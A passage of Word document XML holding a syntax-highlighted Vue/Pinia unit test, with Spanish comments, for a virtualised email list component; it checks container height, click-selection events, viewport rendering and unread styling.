        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pinia'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> VirtualEmailList </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../VirtualEmailList.vue'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'VirtualEmailList'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mockEmails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 length</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(_</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VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`email-</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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`Asunto </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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`Remitente </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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@test.com`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2026</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isRead</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isStarred</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preview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`Vista previa del correo número </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beforeEach</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setActivePinia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createPinia</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'renderiza el contenedor con altura virtual correcta'</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wrapper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(VirtualEmailList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      props</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mockEmails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        selected</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inner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'[style*="position: relative"]'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(inner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">exists</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mmentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 100 items * 80px por item = 8000px</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(inner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">attributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'style'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'height: 8000px'</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'emite evento select-one al hacer click en un email'</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wrapper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(VirtualEmailList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      props</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mockEmails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        selected</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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      attachTo</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firstEmail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'[class*="cursor-pointer"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">at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firstEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">trigger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'click'</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(wrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'select-one'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeTruthy</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(wrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'select-one'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</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toEqual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'email-0'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'renderiza solo los emails visibles en el viewport'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wrapper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(VirtualEmailList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      props</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mockEmails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        selected</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attachTo</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El container simula 800px de alto, con overscan de 5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Debería renderizar ~15 items (10 visibles + 5 overscan)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> items </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'[class*="cursor-pointer"]'</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(items</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toBeLessThanOrEqual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</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(items</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toBeGreaterThan</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'muestra estado de no leído con font-semibold'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wrapper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(VirtualEmailList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      props</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mockEmails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        selected</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items </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'[class*="cursor-pointer"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// El primer email (index 0) es isRead=true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(items[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">classes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'font-semibold'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
